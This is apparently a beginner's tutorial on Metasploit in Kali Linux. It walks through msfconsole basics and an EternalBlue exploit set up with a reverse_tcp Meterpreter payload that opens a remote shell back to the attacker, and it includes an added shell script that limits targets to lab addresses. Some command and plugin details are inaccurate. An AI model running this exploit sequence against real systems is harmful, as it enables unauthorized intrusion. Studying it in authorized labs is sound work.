Getting Started with Metasploit Framework on Kali Linux


So you've installed Kali Linux and want to try out the powerful penetration testing tool Metasploit. With a rich feature set and vibrant community support, Metasploit can look intimidating for beginners. But learning the basics is easier than it seems.

An Introduction to Metasploit

The Metasploit Framework is an open-source tool for developing and executing exploit code against remote target machines. It provides useful exploits that attackers can use to break into systems. But it also helps security professionals and enthusiasts test the vulnerability of their own networks.

In simpler words, Metasploit allows you to act like an attacker to uncover weaknesses in a system before a real attacker can exploit them.

Some key things you can do with the Framework on Kali Linux include:

  • Scan networks and systems for known vulnerabilities

  • Test exploits against vulnerable systems

  • Develop customized exploits for new vulnerabilities

So while this powerful tool is commonly associated with malicious hackers, it was created to empower protection and prevention.

Installing Metasploit Correctly

Metasploit comes built in with Kali Linux, so normally you don't need to install it separately.

Simply click on Applications > Kali Linux > Exploitation Tools > Metasploit Framework to open it.

But if for some reason Metasploit is not showing up or working properly, you can try reinstalling it:

  1. Open a terminal window in Kali.

  2. Type apt update && apt full-upgrade to fully update the OS packages.

  3. Install Metasploit by typing apt install metasploit-framework.

This will reinstall the latest stable version of Metasploit suitable for your OS architecture (32-bit or 64-bit).

Once installed, you can launch Metasploit from the Application Menu similar to before.

Your First Metasploit Console

When you open the Metasploit Framework for the first time, you'll land on the Console interface. This is the heart of the Metasploit CLI (command-line interface).

It may look complex with walls of text at first glance. But let's break it down step-by-step:

Starting the Database

The Console needs a database to store information and track sessions. A PostgreSQL database comes bundled with Metasploit.

To initialize a database, use the command:

msfdb init

You'll only need to run this command once, as it creates the database structure.

Then start and connect to the database for the current session with:

msfdb start

Hosting a Session

To start hosting an attack session, type:

msfconsole

The prompt will change to msf >, indicating that you are now inside the Metasploit session handler.

Basic Console Commands

Here are some of the basic commands you'll need to navigate the console:

  • help - Get help menu for msfconsole commands

  • search [term] - Finds modules (exploits, payloads, etc.) related to the given search term

  • use [module path] - Select a module from the search results to use

  • show options - Displays the configurable options of the selected module

  • set [option] [value] - Change the value of any configurable option

  • execute [action] - Run the selected module

That sums up the basic flow inside msfconsole.

Select a module using use, set the appropriate options with set, then execute it to run.


Running an Exploit Sample

Let's select one of the most common exploits to practice with. We'll try gaining remote access through the EternalBlue SMB vulnerability.

Note that for this demo to work, we need unpatched Windows target machines on the same network with SMB exposed. More on setting up practice labs later.

Selecting the EternalBlue Exploit

First, search for 'eternal' exploits:

msf > search eternal

Among the results, you'll find an exploit module called exploit/windows/smb/ms17_010_eternalblue. Let's use it:

msf > use exploit/windows/smb/ms17_010_eternalblue

This selects the EternalBlue exploit module for use.

Checking Options

Before running a module blindly, always check what options you can configure:

msf > show options

For the EternalBlue exploit, the important options are RHOSTS, which is the target IP address, and PAYLOAD, which determines what gets executed on vulnerable systems.

Setting Options

If we want to inject a simple remote cmd shell on vulnerable Windows systems, set the payload to windows/meterpreter/reverse_tcp:

msf > set PAYLOAD windows/meterpreter/reverse_tcp

Provide your local host IP as the LHOST value; this is where the meterpreter shell will connect back to.

Then set RHOSTS to the IP address of your Windows target machine.
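Because the module goes wherever RHOSTS points and the payload calls back to whatever LHOST says, a practitioner usually wants a guard that refuses to set either option to an address outside the practice lab. The POSIX shell snippet below is an added example, not code from the original post or from the Metasploit project; it assumes the lab lives on RFC 1918 private addresses (VirtualBox's default host-only network is 192.168.56.0/24) and prints a ready-to-paste set line only when the address passes that check.

```shell
#!/bin/sh
# Lab guard for msfconsole option values (added example, not part of the
# original post or the Metasploit project). It only emits "set OPTION ADDR"
# when ADDR is a well-formed IPv4 address in an RFC 1918 private range, so a
# typo cannot point RHOSTS or LHOST at a host outside the practice lab.
# Assumption: the lab uses private addresses, e.g. VirtualBox's default
# host-only network 192.168.56.0/24.

# is_private_ipv4 ADDR: returns 0 for 10/8, 172.16/12 and 192.168/16, else 1.
is_private_ipv4() {
    addr=$1
    # Reject empty input, anything that is not digits and dots, and empty octets.
    case $addr in
        ''|*[!0-9.]*|.*|*.|*..*) return 1 ;;
    esac
    # Split on dots into the positional parameters $1..$4.
    oldifs=$IFS
    IFS=.
    set -- $addr
    IFS=$oldifs
    [ $# -eq 4 ] || return 1
    for octet in "$@"; do
        [ "$octet" -le 255 ] || return 1
    done
    if [ "$1" -eq 10 ]; then
        return 0
    elif [ "$1" -eq 172 ] && [ "$2" -ge 16 ] && [ "$2" -le 31 ]; then
        return 0
    elif [ "$1" -eq 192 ] && [ "$2" -eq 168 ]; then
        return 0
    fi
    return 1
}

# lab_set OPTION ADDR: print the msfconsole command for a lab address, or
# complain on stderr and return 1 without printing anything to stdout.
lab_set() {
    opt=$1
    addr=$2
    if is_private_ipv4 "$addr"; then
        printf 'set %s %s\n' "$opt" "$addr"
    else
        printf 'lab guard: refusing to set %s to non-lab address %s\n' \
            "$opt" "$addr" >&2
        return 1
    fi
}

# Demonstration with constructed addresses: the first two are accepted, the
# third (a documentation-range address) is refused. Runs only when the
# LAB_GUARD_DEMO variable is set, so the file can also be sourced quietly.
if [ "${LAB_GUARD_DEMO:-0}" = 1 ]; then
    lab_set RHOSTS 192.168.56.101
    lab_set LHOST 192.168.56.1
    lab_set RHOSTS 203.0.113.10 || true
fi
```

Save it as lab_guard.sh, source it with . ./lab_guard.sh, and append the accepted lines to a resource file (lab_set RHOSTS 192.168.56.101 >> lab.rc; lab_set LHOST 192.168.56.1 >> lab.rc). msfconsole can load that file with msfconsole -r lab.rc, so the addresses you paste into the console have already been checked against the lab range.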

Executing the Metasploit Exploit

With that configured, execute the exploit:

msf > exploit

If everything is configured properly, you'll get a new meterpreter session once the exploit runs successfully.

Interact with the session to start the remote cmd shell on the exploited machine for further penetration testing.

And that's the basic flow of selecting Metasploit modules and running exploits with it.

Setting Up Your Own Practice Labs

While randomly scanning IPs on public networks to practice Metasploit is not advisable, you can build safe home labs to try out the tools without risk.

Here are some quick DIY hacking lab solutions you can use for practicing Metasploit Framework:

Virtualbox Lab with VulnHub

VirtualBox allows creating and running multiple virtual machines easily on your OS. With premade vulnerable VM images from VulnHub, you can simulate entire labs to practice Metasploit.

Download VirtualBox, set up a host-only network, then import VulnHub box images such as Mr Robot, Kioptrix and Stapler. These come with known vulnerabilities to exploit using Metasploit.

Raspberry Pi Army

Buy a few Raspberry Pi SBCs and install vulnerable operating systems on them. Build your own IoT village of hackable devices with Raspberry Pis!

You can connect the Pis over a LAN or to your laptop over a Wi-Fi hotspot for easy access.

Purchase Physical Machines

Dedicated penetration testers can invest in used laptops and PCs to build physical Windows and Linux boxes to hack without restrictions. Physical machines allow testing a broader spectrum of exploits.

While practice labs are safer, you can also try penetration testing officially after getting permission from the owners 😉.

Exploring Metasploit Plugins for Kali

Metasploit Framework offers tons of built-in modules and advanced functionality through plugins developed by community members.

Using these plugins, you can further enhance your pentesting process with Metasploit.

Autopwn - Metasploit Automation

For example, the Autopwn plugin tries to automatically run through Metasploit modules to exploit vulnerabilities without manual intervention.

Simply activate autopwn after selecting an exploit target, and the rest will be handled automatically.

Scanner - Finding Exploits

The Scanner add-on helps scan network ranges for potential targets. It also fingerprints running services to detect known vulnerabilities and then suggests compatible Metasploit modules.

So manually searching individual IPs is simplified.

There are hundreds of such useful add-ons for scanning, sniffing traffic, automating Metasploit functions, etc.

Exploring these lets you significantly improve your capabilities with Metasploit Framework on Kali Linux. GitHub hosts a number of updated Metasploit plugins that you can reference.

Responsible Disclosure: Practice Legally & Ethically

Now that you know your way around Metasploit console and running exploits, it's critical I emphasize this - hacking without permission is illegal!

So setting up authorized practice environments like home labs, capturing flags in VulnHub VMs, etc., is a safer first step before jumping to public scanning and real-world tests.

Additionally, once vulnerabilities are discovered, even during authorized tests, responsibly disclosing them to the affected parties helps mitigate risk, so they can patch the issues before actual attacks happen.

Use tools like Metasploit mindfully, without causing harm. Remember with great power comes great responsibility.

Wrapping Up

I hope this intro guide gave you a good overview of Metasploit Framework essentials on Kali Linux.

We went through starting the msfconsole, selecting exploits, configuring options, executing modules, and interacting with remote shells.

You also know how to set up safe practice environments using virtual machines and Raspberry Pi devices, and we explored some handy plugins to further extend Metasploit's capabilities.